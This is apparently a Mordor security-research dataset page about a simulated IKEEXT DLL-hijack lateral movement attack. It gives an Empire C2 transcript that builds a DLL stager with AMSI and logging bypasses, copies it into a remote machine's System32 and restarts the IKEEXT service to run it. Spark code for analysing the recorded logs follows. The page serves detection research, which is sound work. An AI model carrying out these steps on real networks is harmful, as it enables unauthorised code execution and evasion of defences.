IKEEXT Remote Service DLL Hijack¶
Metadata¶
Author |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2019/04/03 |
Modification Date |
2020/09/20 |
Tactics |
|
Techniques |
[‘T1574.001’] |
Tags |
[‘Remote Service DLL Hijacking’, ‘RPC over SMB Svcctl’] |
Dataset Description¶
This dataset represents adversaries copying a file remotely to replace a file which is executed by a service that is vulnerable to DLL hijack. This dataset includes
Datasets Downloads¶
Dataset Type |
Link |
|---|---|
Host |
|
Network |
Simulation Plan¶
Environment |
Tool Type |
Module |
|---|---|---|
Mordor shire |
C2 |
manual |
Adversary View¶
(Empire: agents) > usestager windows/dll
(Empire: stager/windows/dll) > info
Name: DLL Launcher
Description:
Generate a PowerPick Reflective DLL to inject with
stager code.
Options:
Name Required Value Description
---- -------- ------- -----------
Listener True http Listener to use.
Language True powershell Language of the stager to generate.
Arch True x64 Architecture of the .dll to generate
(x64 or x86).
StagerRetries False 0 Times for the stager to retry
connecting.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
OutFile True /tmp/wlbsctrl.dll File to output dll to.
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
AMSIBypass False True Include mattifestation's AMSI Bypass in
the stager code.
AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in
the stager code.
ScriptLogBypass False True Include cobbr's Script Block Log Bypass
in the stager code.
ETWBypass False False Include tandasat's ETW bypass in the
stager code.
(Empire: stager/windows/dll) > back
(Empire: agents) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
GCSKD17Z ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 1112 5/0.0 2020-09-22 03:51:02 http
(Empire: agents) > interact GCSKD17Z
(Empire: GCSKD17Z) >
(Empire: GCSKD17Z) > upload /tmp/wlbsctrl.dll
[*] Tasked agent to upload wlbsctrl.dll, 124 KB
(Empire: GCSKD17Z) > shell COPY .\wlbsctrl.dll \\WORKSTATION6\C$\Windows\System32\wlbsctrl.dll
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 3
(Empire: GCSKD17Z) >
..Command execution completed.
(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 stop IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 4
(Empire: GCSKD17Z) >
SERVICE_NAME: IKEEXT
TYPE : 30 WIN32
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x1388
..Command execution completed.
(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 query IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 5
(Empire: GCSKD17Z) >
SERVICE_NAME: IKEEXT
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
..Command execution completed.
(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 start IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 6
(Empire: GCSKD17Z) >
SERVICE_NAME: IKEEXT
TYPE : 30 WIN32
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 6172
FLAGS :
..Command execution completed.
(Empire: GCSKD17Z) >
Explore Mordor Dataset¶
Initialize Analytics Engine¶
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File¶
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_shell_dcerpc_smb_service_dll_hijack.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data¶
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname |Channel |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|MORDORDC.theshire.local |Security |4658 |768 |
|WORKSTATION5.theshire.local|Windows PowerShell |800 |508 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |10 |466 |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103 |409 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |13 |386 |
|MORDORDC.theshire.local |Security |4656 |384 |
|MORDORDC.theshire.local |Security |4690 |384 |
|MORDORDC.theshire.local |Security |4663 |367 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |12 |328 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |286 |
|MORDORDC.theshire.local |Security |5447 |192 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |12 |176 |
|MORDORDC.theshire.local |Microsoft-Windows-PowerShell/Operational|4103 |169 |
|MORDORDC.theshire.local |Windows PowerShell |800 |169 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |10 |158 |
|MORDORDC.theshire.local |Security |5156 |123 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |92 |
|MORDORDC.theshire.local |Security |5158 |89 |
|WORKSTATION5.theshire.local|security |5158 |76 |
|MORDORDC.theshire.local |Security |4703 |72 |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows